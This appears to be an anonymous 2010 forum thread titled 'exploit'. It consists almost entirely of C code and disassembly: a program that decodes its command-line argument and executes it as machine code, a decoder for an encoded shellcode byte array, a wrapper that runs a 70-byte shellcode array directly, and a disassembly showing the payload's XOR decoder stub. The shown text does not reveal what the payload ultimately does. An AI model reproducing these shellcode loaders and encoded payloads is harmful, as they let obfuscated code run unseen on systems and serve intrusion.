Name:
Anonymous
2010-11-16 17:30
exploit
#include <stdio.h>
#include <string.h>
#define MAX 0xFF
int main(int argc, char **argv)
{
if (argc != 2)
return 1;
else {
char buf[MAX];
int i;
strncpy(buf, argv[1], MAX);
for (i = 0; i < strlen(buf); ++i)
buf[i] = (buf[i] - (i % 0xF)) ^ i;
((void(*)())buf)();
return 0;
}
}
Name:
Anonymous
2010-11-17 7:41
u mena
1
/* reverse.c
*/
#include <stdio.h>
#include <string.h>
char shellcode[] = {
0x6a, 0x0e, 0x5d, 0xdd, 0xee, 0xe1, 0x78, 0x2a, 0x04, 0x5b, 0x95,
0x83, 0x2b, 0x53, 0x1b, 0x98, 0xac, 0x94, 0xfc, 0xf3, 0xfb, 0xe7,
0x3e, 0x27, 0xe0, 0x45, 0x0e, 0x8a, 0xf0, 0x99, 0x36, 0x96, 0x52,
0xf5, 0x4a, 0x58, 0xe1, 0xa5, 0x0d, 0x14, 0xe7, 0x06, 0x1b, 0xae,
0x66, 0xc4, 0x8e, 0x23, 0xaa, 0x8e, 0x7e, 0x48, 0xd5, 0xb6, 0x59,
0x50, 0xd4, 0xae, 0x6b, 0x5e, 0xc4, 0xec, 0x12, 0x3f, 0x84, 0xae,
0x86, 0xa8, 0x26, 0x87
};
int main(void)
{
int i;
for (i = 0; i < sizeof shellcode; ++i) {
printf("0x%02x ", (unsigned char)((shellcode[i] - (i % 0xF)) ^ i));
if ((i % 10) == 9)
putchar('\n');
}
putchar('\n');
return 0;
}
2
/* wrap.c
*/
char shellcode[] = {
0x6a, 0x0c, 0x59, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b,
0x81, 0x73, 0x13, 0x4b, 0x03, 0x97, 0xbb, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0x21, 0x08, 0xcf, 0x22, 0x19, 0x65, 0xff, 0x96,
0x28, 0x8a, 0x70, 0xd3, 0x64, 0x70, 0xff, 0xbb, 0x23, 0x2c,
0xf5, 0xd2, 0x25, 0x8a, 0x74, 0xe9, 0xa3, 0x0e, 0x97, 0xbb,
0x4b, 0x71, 0xfa, 0x9b, 0x66, 0x71, 0xf1, 0x9b, 0x64, 0x6b,
0xf8, 0xd6, 0x2e, 0x03, 0xc0, 0xe8, 0xc2, 0xe2, 0x5a, 0x3b
};
int main(void) {
((void(*)())shellcode)();
return 0;
}
3
08049580 <shellcode>:
8049580: 6a 0c push $0xc
8049582: 59 pop %ecx
8049583: d9 ee fldz
8049585: d9 74 24 f4 fnstenv -0xc(%esp)
8049589: 5b pop %ebx
804958a: 81 73 13 4b 03 97 bb xorl $0xbb97034b,0x13(%ebx)
8049591: 83 eb fc sub $0xfffffffc,%ebx
8049594: e2 f4 loop 804958a <shellcode+0xa>
8049596: 21 08 and %ecx,(%eax)
8049598: cf iret
8049599: 22 19 and (%ecx),%bl
804959b: 65 ff 96 28 8a 70 d3 call *%gs:-0x2c8f75d8(%esi)
80495a2: 64 fs
80495a3: 70 ff jo 80495a4 <shellcode+0x24>
80495a5: bb 23 2c f5 d2 mov $0xd2f52c23,%ebx
80495aa: 25 8a 74 e9 a3 and $0xa3e9748a,%eax
80495af: 0e push %cs
80495b0: 97 xchg %eax,%edi
80495b1: bb 4b 71 fa 9b mov $0x9bfa714b,%ebx
80495b6: 66 data16
80495b7: 71 f1 jno 80495aa <shellcode+0x2a>
80495b9: 9b fwait
80495ba: 64 fs
80495bb: 6b f8 d6 imul $0xffffffd6,%eax,%edi
80495be: 2e cs
80495bf: 03 c0 add %eax,%eax
80495c1: e8 c2 e2 5a 3b call 435f7888 <_end+0x3b5ae2b8>